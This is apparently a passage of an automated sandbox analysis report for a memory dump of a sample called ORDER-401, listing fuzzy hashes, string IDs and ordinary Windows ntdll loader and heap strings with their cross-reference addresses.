                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                    • API String ID: 0-379654539
                                                                    • Opcode ID: c82e5e1a1022c85d22e2fdc03c9f439f92b9e463c43976d90e33dda2dc0177ee
                                                                    • Instruction ID: 5726c4c9ee12a8cc55e42775e5d2d08ab17f66892dfca45fe34c8260faa78892
                                                                    • Opcode Fuzzy Hash: c82e5e1a1022c85d22e2fdc03c9f439f92b9e463c43976d90e33dda2dc0177ee
                                                                    • Instruction Fuzzy Hash: 37C189755483828FD761CF58C144BAEB7E4FF84708F04896AF9968F251E734C949CBA2
                                                                    Strings
                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 01578421
                                                                    • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0157855E
                                                                    • LdrpInitializeProcess, xrefs: 01578422
                                                                    • @, xrefs: 01578591
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-1918872054
                                                                    • Opcode ID: 5e45a2f160e5f7d5ef71c8979c97c7afe3a916dadbb0ab5d95d916f11ce6034c
                                                                    • Instruction ID: 18c8193df96355495370e920e45161e9d32dc85d72712858e268e7ff0be21f18
                                                                    • Opcode Fuzzy Hash: 5e45a2f160e5f7d5ef71c8979c97c7afe3a916dadbb0ab5d95d916f11ce6034c
                                                                    • Instruction Fuzzy Hash: 53918D71518346AFD722EF25DC85EAFBAECBF84744F40092EFA849A151E770D904CB62
                                                                    Strings
                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 015B22B6
                                                                    • SXS: %s() passed the empty activation context, xrefs: 015B21DE
                                                                    • .Local, xrefs: 015728D8
                                                                    • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 015B21D9, 015B22B1
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                    • API String ID: 0-1239276146
                                                                    • Opcode ID: 8e3ee07f1c0ef8a128cffe86f44ce96ea406bba8ccc01fd5cfe72b4b8c6a7f13
                                                                    • Instruction ID: 4311ae125caa61290cfb46ea28f2e1cf6d5fed055097439f4508369f73c1a9b3
                                                                    • Opcode Fuzzy Hash: 8e3ee07f1c0ef8a128cffe86f44ce96ea406bba8ccc01fd5cfe72b4b8c6a7f13
                                                                    • Instruction Fuzzy Hash: C1A1AE3190022ADBDB25CF68DC85BA9B7B5BF58354F1845EAD908AF251D730AEC1CF90
                                                                    Strings
                                                                    • RtlDeactivateActivationContext, xrefs: 015B3425, 015B3432, 015B3451
                                                                    • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 015B3437
                                                                    • SXS: %s() called with invalid flags 0x%08lx, xrefs: 015B342A
                                                                    • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 015B3456
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                    • API String ID: 0-1245972979
                                                                    • Opcode ID: 35c95d9f277b70044df0756e10252e82fe985d50c6442a6bdc9eaeeb58ec2547
                                                                    • Instruction ID: 2522e5502fb16e87560258b0a9c02d18e5a6c30b852369138f31896b5a76f4a2
                                                                    • Opcode Fuzzy Hash: 35c95d9f277b70044df0756e10252e82fe985d50c6442a6bdc9eaeeb58ec2547
                                                                    • Instruction Fuzzy Hash: 976101366107129FDB22CF1DD886B7AB7E5BF80B50F148569E959AF280D734E801CB91
                                                                    Strings
                                                                    • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 015A1028
                                                                    • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 015A10AE
                                                                    • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 015A0FE5
                                                                    • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 015A106B
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                    • API String ID: 0-1468400865
                                                                    • Opcode ID: d3f5b70d2355a820515f960c872a76dbe7e04647d968b25f89e8b5a5328e526c
                                                                    • Instruction ID: 20c53bf2572d9b1dcc324f570d2828c4bc26ba18c069c5cde4a004cafcd16ae0
                                                                    • Opcode Fuzzy Hash: d3f5b70d2355a820515f960c872a76dbe7e04647d968b25f89e8b5a5328e526c
                                                                    • Instruction Fuzzy Hash: B871E2B19043469FCB21EF54C884B9B7FA8BF96768F800469F9488F186D334D589CBD2
                                                                    Strings
                                                                    • minkernel\ntdll\ldrsnap.c, xrefs: 015B3640, 015B366C
                                                                    • LdrpFindDllActivationContext, xrefs: 015B3636, 015B3662
                                                                    • Querying the active activation context failed with status 0x%08lx, xrefs: 015B365C
                                                                    • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 015B362F
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                    • API String ID: 0-3779518884
                                                                    • Opcode ID: 8debbf77c707fd232793d1dc2f5d9390014a434e0a9845a2d417c77dbc479f4e
                                                                    • Instruction ID: df47074f35b863c7fe4222aed1342c5ff403e3c889485efa2e54c0e0b153d25c
                                                                    • Opcode Fuzzy Hash: 8debbf77c707fd232793d1dc2f5d9390014a434e0a9845a2d417c77dbc479f4e
                                                                    • Instruction Fuzzy Hash: C0312E32900251AEEF339B4DEC8FB7EB6A4FB01754F06402AD5856F251D7A0AC8087D5
                                                                    Strings
                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 015AA9A2
                                                                    • apphelp.dll, xrefs: 01562462
                                                                    • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 015AA992
                                                                    • LdrpDynamicShimModule, xrefs: 015AA998
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-176724104
                                                                    • Opcode ID: d5464c4865b62886aeb60fd109d270d548f853b8e000f44d593f5969e53bf81e
                                                                    • Instruction ID: c8887eb3b3c8598d7afe28ba3ab485ef5b3f73a2acaddcfd3ca6895cfc59d9d1
                                                                    • Opcode Fuzzy Hash: d5464c4865b62886aeb60fd109d270d548f853b8e000f44d593f5969e53bf81e
                                                                    • Instruction Fuzzy Hash: F4316472A40202EFEB319F6DDC85AAE7BF8FBC4B00F560419E9016F245C7B09991CB90
                                                                    Strings
                                                                    • HEAP: , xrefs: 01553264
                                                                    • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0155327D
                                                                    • HEAP[%wZ]: , xrefs: 01553255
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                    • API String ID: 0-617086771
                                                                    • Opcode ID: ee9b4d7080eea9c1afde1521b2502d17b6ea839c5af0415f82e3fb4ffcace08c
                                                                    • Instruction ID: 878ea3dc279eb22acb3c1d29a19040ecdd15c8b858999b1ec4fcb7bc45c859a9
                                                                    • Opcode Fuzzy Hash: ee9b4d7080eea9c1afde1521b2502d17b6ea839c5af0415f82e3fb4ffcace08c
                                                                    • Instruction Fuzzy Hash: 1192AA71A04249DFDBA5CFA8C4547AEBBF1BF48310F18849AE85AAF252D734A941CF50
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                    • API String ID: 0-4253913091
                                                                    • Opcode ID: 277cd2516a771e370acfca62ac0187b6b19f44bbf0582a3a3c7e7f18c50910f2
                                                                    • Instruction ID: 045c3c96122bb314af9e15e1f4d72a3fcd6aea491ec74cad9fbcc7537f0c54fe
                                                                    • Opcode Fuzzy Hash: 277cd2516a771e370acfca62ac0187b6b19f44bbf0582a3a3c7e7f18c50910f2
                                                                    • Instruction Fuzzy Hash: BCF17830A00606DFEB55CF68C8A4F6EBBF5FF84304F14856AE9569F285D734A981CB90
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $@
                                                                    • API String ID: 0-1077428164
                                                                    • Opcode ID: 67527af1d9431495a67d0290f137c80665348ea72d9b8b808103ea9636656ea9
                                                                    • Instruction ID: 7b9e3002842a59b800c9e85969759fd15e6585a9d8f41fb4d600062c67db07ca
                                                                    • Opcode Fuzzy Hash: 67527af1d9431495a67d0290f137c80665348ea72d9b8b808103ea9636656ea9
                                                                    • Instruction Fuzzy Hash: 8CC25F716083419FE725CF28C841BAFBBE9BFC8754F04892DE9998B251D734D845CB92
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: FilterFullPath$UseFilter$\??\
                                                                    • API String ID: 0-2779062949
                                                                    • Opcode ID: 1a1005b30ed844653a2aed16292758225c191bbd95f100955d101d0840a10414
                                                                    • Instruction ID: f43663b393d2e164a212510b5b1a7d9416fe0f428d7c20f804279a76c990453d
                                                                    • Opcode Fuzzy Hash: 1a1005b30ed844653a2aed16292758225c191bbd95f100955d101d0840a10414
                                                                    • Instruction Fuzzy Hash: C8A13C7191162A9BDF21DF68CC88BADB7B8FF44710F1041E9E909AB250E7359E84CF51
                                                                    Strings
                                                                    • Failed to allocated memory for shimmed module list, xrefs: 015AA10F
                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 015AA121
                                                                    • LdrpCheckModule, xrefs: 015AA117
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-161242083
                                                                    • Opcode ID: 88483e9bb43e74947a0a2d6c31c490c3c8bbd81cff3f7798eab5bc73df0145ad
                                                                    • Instruction ID: 40aedf194cb1d57f2c0650630fbaf5941697e30320738ea57635ee6b980d39f1
                                                                    • Opcode Fuzzy Hash: 88483e9bb43e74947a0a2d6c31c490c3c8bbd81cff3f7798eab5bc73df0145ad
                                                                    • Instruction Fuzzy Hash: 2B71B171A40206DFEB25DF68CD85ABEB7F4FB84304F14446DE802AF295D734AA51CB90
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                    • API String ID: 0-1334570610
                                                                    • Opcode ID: a4f046447f6836853426980de81512346fc465363d49ba59a5ee2e115527676e
                                                                    • Instruction ID: bf37109077aa64c9b7abd07960851fdac0568dcb89bae45707aa73d2276a5228
                                                                    • Opcode Fuzzy Hash: a4f046447f6836853426980de81512346fc465363d49ba59a5ee2e115527676e
                                                                    • Instruction Fuzzy Hash: 2161B071610306DFDB69CF28C890B6EBBE1FF84714F14855AE8558F292E7B0E881CB91
                                                                    Strings
                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 015B82E8
                                                                    • Failed to reallocate the system dirs string !, xrefs: 015B82D7
                                                                    • LdrpInitializePerUserWindowsDirectory, xrefs: 015B82DE
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-1783798831
                                                                    • Opcode ID: c509dd60eb2b2d349cbcf0483a58b8850524d619603459bc93bc6c57a8311614
                                                                    • Instruction ID: 26142108df7a7475144ea11b7240c3f4316ac06df722717dfe8d4c906e8f99a8
                                                                    • Opcode Fuzzy Hash: c509dd60eb2b2d349cbcf0483a58b8850524d619603459bc93bc6c57a8311614
                                                                    • Instruction Fuzzy Hash: 3B41E171514312ABD721EB68ED81B5FB7E8BF85750F00592EF949DB290EB70D8108B92
                                                                    Strings
                                                                    • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 015FC1C5
                                                                    • PreferredUILanguages, xrefs: 015FC212
                                                                    • @, xrefs: 015FC1F1
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                    • API String ID: 0-2968386058
                                                                    • Opcode ID: 39c07908eadb88f0a7e1b65048062f235c8a10491df92c022dd828a89fb23707
                                                                    • Instruction ID: de939b9937e6baa7f8ab359294f6f2f85221de5207e794cb147635a90f3f9fce
                                                                    • Opcode Fuzzy Hash: 39c07908eadb88f0a7e1b65048062f235c8a10491df92c022dd828a89fb23707
                                                                    • Instruction Fuzzy Hash: E6416176E1020EABDB11DAD8C851FEEBBB8FB54700F14407AEB49BB240D7749A44CB50
                                                                    Strings
                                                                    Memory Dump Source
• Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
Similarity
• API ID:
• String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
• API String ID: 0-1373925480
• Opcode ID: bd08e22c98ac400a8149509e72f5d69f6e78a31d568f00fb6a8abdd329fab9e0
• Instruction ID: 977cc9ed87e880430b609546555458adc1fcf701165d64389a20950de14d9f28
• Opcode Fuzzy Hash: bd08e22c98ac400a8149509e72f5d69f6e78a31d568f00fb6a8abdd329fab9e0
• Instruction Fuzzy Hash: 8541BF32A0065A8BEB26DBE9C844BADBBF9FF95340F14045AD901EFB91D7348901CB51

Strings
• Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 015C4888
• LdrpCheckRedirection, xrefs: 015C488F
• minkernel\ntdll\ldrredirect.c, xrefs: 015C4899
Memory Dump Source
• Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
Similarity
• API ID:
• String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
• API String ID: 0-3154609507
• Opcode ID: 6d33d0efe026e6239ece371387de33938f401fdcc732a09528ad1af0f92e6e08
• Instruction ID: 87ceb03166be66a947fae14f884e54c64e25f96691760dcdc769cbfa58d18d9f
• Opcode Fuzzy Hash: 6d33d0efe026e6239ece371387de33938f401fdcc732a09528ad1af0f92e6e08
• Instruction Fuzzy Hash: 27419E32A046519FDB22CEACD860E2B7BE4FF89E50B05056DED499F216D730D811CB91

Strings
Memory Dump Source
• Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
Similarity
• API ID:
• String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
• API String ID: 0-2558761708
• Opcode ID: 3f39d3fc2d471e5778e8c3d79599e9e5157beb724d094606174d5b66de499fc0
• Instruction ID: 9196e2a842b325e031c5704fab27f793cf62baa4d690a95e51158de4b7414155
• Opcode Fuzzy Hash: 3f39d3fc2d471e5778e8c3d79599e9e5157beb724d094606174d5b66de499fc0
• Instruction Fuzzy Hash: A811E4323641029FD759CA28C891F7EB7A5FF80725F19851AF806CF291E734D841C751

Strings
• Process initialization failed with status 0x%08lx, xrefs: 015C20F3
• minkernel\ntdll\ldrinit.c, xrefs: 015C2104
• LdrpInitializationFailure, xrefs: 015C20FA
Memory Dump Source
• Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
Similarity
• API ID:
• String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
• API String ID: 0-2986994758
• Opcode ID: a641184206160ffb7814383a8c2ee5d184c73c81861a951d87f6b75649994206
• Instruction ID: 806c04577605a60bc3c20c74e9af2f36dee29fc2f2b7c0857243551742bbef93
• Opcode Fuzzy Hash: a641184206160ffb7814383a8c2ee5d184c73c81861a951d87f6b75649994206
• Instruction Fuzzy Hash: 1AF0C239A40319AFE724EA8DCC56FAA3B68FB81F54F50006DFA007F6C5D2F0A950C691

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: #%u
• API String ID: 48624451-232158463
• Opcode ID: 07e459a7a66d58abe14c0a0c6759bc38e4abd7f6f8a0e63e6e06ef1186e193c3
• Instruction ID: 4ed8e61426d32137649801c0ebac6c514b31138acfdf55840c855508d4cb715d
• Opcode Fuzzy Hash: 07e459a7a66d58abe14c0a0c6759bc38e4abd7f6f8a0e63e6e06ef1186e193c3
• Instruction Fuzzy Hash: C7715C71A0014ADFDB41DFE8C990BAEBBF8BF48744F144065E905EB291EA74ED01CBA1

Strings
• LdrResSearchResource Enter, xrefs: 0154AA13
• LdrResSearchResource Exit, xrefs: 0154AA25
Memory Dump Source
• Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
Similarity
• API ID:
• String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
• API String ID: 0-4066393604
• Opcode ID: 43e0f2c0fe9879b363e4580dfb9f3260fa105ce41fb567b2372279c639ee4369
• Instruction ID: 62884172550538e566f6f072f07225b894c4c4355e98f31cce4258796c168ab8
• Opcode Fuzzy Hash: 43e0f2c0fe9879b363e4580dfb9f3260fa105ce41fb567b2372279c639ee4369
• Instruction Fuzzy Hash: 60E19471E802199FEB62CF99C980BAEBBB9FF44358F14442AE912EF251D774D940CB50

Strings
Memory Dump Source
• Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
Similarity
• API ID:
• String ID: `$`
• API String ID: 0-197956300
• Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
• Instruction ID: ab032dab2c50b7035bf98dbc86eb96c173b81c0424f224f5fd8c87afaf149914
• Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
• Instruction Fuzzy Hash: 0AC1AF312143429BE72ACE68CC41B6BBBE5BFC4394F088A2DF6968B2D1D775D505CB41

Strings
Memory Dump Source
• Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
Similarity
• API ID: InitializeThunk
• String ID: Legacy$UEFI
• API String ID: 2994545307-634100481
• Opcode ID: 1622ad545b0a95096bf734a4d5efbfc6d8b1bdc72a38df4f2bc5487494acfa79
• Instruction ID: 05c597ec9de2910d9f1e3560f8f37793e90feb77a108e408244b50991c7aa297
• Opcode Fuzzy Hash: 1622ad545b0a95096bf734a4d5efbfc6d8b1bdc72a38df4f2bc5487494acfa79
• Instruction Fuzzy Hash: F5613B71E006199FDB15DFA88881BEEBBF5FB48700F18846DE659EF291D731A901CB50

Strings
Memory Dump Source
• Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
Similarity
• API ID:
• String ID: @$MUI
• API String ID: 0-17815947
• Opcode ID: 5a3122afc3f8b8165fcf8b8db265979e72c83d2ae928cfe6cbe93e4ef9e90da2
• Instruction ID: d9ae1be6b0adbda4c4ae02594b0c96fd4be24042ec4f73d28087c6a36046628f
• Opcode Fuzzy Hash: 5a3122afc3f8b8165fcf8b8db265979e72c83d2ae928cfe6cbe93e4ef9e90da2
• Instruction Fuzzy Hash: 0A510871E0021EAFDB15DFA9CC94AEEBBF8BB44754F10052AE611FB290D6309905CB60

Strings
• kLsE, xrefs: 01540540
• TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0154063D
Memory Dump Source
• Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
Similarity
• API ID:
• String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
• API String ID: 0-2547482624
• Opcode ID: b4a7e1fc26a230b33d508822430e67c8c643f2f4a9146cb683143ebd6aff3f88
• Instruction ID: 721ec71743dae3111a6ec79c87cf5805df10ff8c13d2d202e3989278b024c282
• Opcode Fuzzy Hash: b4a7e1fc26a230b33d508822430e67c8c643f2f4a9146cb683143ebd6aff3f88
• Instruction Fuzzy Hash: 7951AE715047429BD725EF68C4406EBBBE8BF85308F20483EFADA8B281E770D545CB92

Strings
• RtlpResUltimateFallbackInfo Enter, xrefs: 0154A2FB
• RtlpResUltimateFallbackInfo Exit, xrefs: 0154A309
Memory Dump Source
• Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
Similarity
• API ID:
• String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
• API String ID: 0-2876891731
• Opcode ID: 6c753e64fb6f2235f8682b9d1fd002a38ec77964766a7699201700ba7a25aebf
• Instruction ID: ff55caf084fcd7e651adc409d14e50aa18fe03af36d175dc44844bf41c880faa
• Opcode Fuzzy Hash: 6c753e64fb6f2235f8682b9d1fd002a38ec77964766a7699201700ba7a25aebf
• Instruction Fuzzy Hash: FE41AD31A8464ADBEB21CF69C840B6E7BF4FF85704F1444A9E906DF295E3B5D940CB50

Strings
Memory Dump Source
• Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
Similarity
• API ID: InitializeThunk
• String ID: Cleanup Group$Threadpool!
• API String ID: 2994545307-4008356553
• Opcode ID: db54c92b4ecd81d141b059de370831bd854d491c52040d103d0a4c556e43ce45
• Instruction ID: b797df667d95bc283b69a75473ae309468a0bf939281b02319ac65152c101da7
• Opcode Fuzzy Hash: db54c92b4ecd81d141b059de370831bd854d491c52040d103d0a4c556e43ce45
• Instruction Fuzzy Hash: A201D1B2654700AFE312DF24DD46B1A7BE8F785715F048939A648CB190E374D904CB46

Strings
Memory Dump Source
• Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
Similarity
• API ID:
• String ID: MUI
• API String ID: 0-1339004836
• Opcode ID: 3d07be1505f73e3826a754867157f5addc7574b41cc77e22e41a81ba2ff7d78c
• Instruction ID: b3a3334ba1e617be53469395ce5e4b94e3a63cef6908d93915bc1f7c2c8e2477
• Opcode Fuzzy Hash: 3d07be1505f73e3826a754867157f5addc7574b41cc77e22e41a81ba2ff7d78c
• Instruction Fuzzy Hash: D6827B75E012199FEB25CFA9C880BEDBBB1BF88318F14816AE959AF350D7709941CF50

Strings
Memory Dump Source
• Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
Similarity
• API ID:
• String ID:
• API String ID: 0-3916222277
• Opcode ID: fd1581be924f92bc3ff09dbb03b232037a01be87a3b248bb0acc730b95d5bc41
• Instruction ID: fd972db34ccf6f4687eef2a29e4d933e2c8c6bcd933962c9c8891ce21cbd6815
• Opcode Fuzzy Hash: fd1581be924f92bc3ff09dbb03b232037a01be87a3b248bb0acc730b95d5bc41
• Instruction Fuzzy Hash: 8C915271A0021AAFEB21DF95CD85FAE7BB8FF54B50F100059F605AF291D774AA00CBA0

Strings
Memory Dump Source
• Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
